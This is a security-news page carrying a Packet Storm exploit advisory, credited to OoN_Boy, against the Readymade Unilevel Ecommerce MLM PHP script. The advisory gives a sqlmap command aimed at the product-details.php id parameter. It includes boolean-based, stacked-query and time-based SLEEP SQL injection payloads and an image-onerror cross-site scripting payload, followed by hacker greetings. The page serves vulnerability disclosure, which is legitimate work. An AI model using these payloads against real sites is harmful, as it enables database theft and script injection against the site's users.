Security
Headlines
HeadlinesLatestCVEs

Headline

ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting

Readymade Unilevel Ecommerce MLM suffers from remote blind SQL injection and cross site scripting vulnerabilities. These issues affected the version released as late as March 15, 2024.

Packet Storm
#sql#xss#vulnerability#php#auth
[x]========================================================================================================================================[x] | Title        : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities | Software     : Readymade Unilevel Ecommerce | Last Update  : 15/03/24 [TESTED VERSION SCRIPT] | First Release: 16/11/21 | Vendor       : http://www.i-netsolution.com/ | Date         : 01 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology       : PHP | Database         : MySQL | Price            : $500 | Description      : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.[x]========================================================================================================================================[x][O] Exploit    http://localhost/eommlm/product-details.php?id=11[SQL]  http://localhost/ecomlm/product-details.php?id=11[XSS]  [O] Proof of concept    sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string    [SQL]  Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=11 AND 1189=1189    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: id=11;SELECT SLEEP(10)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)    [XSS]    http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY>    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution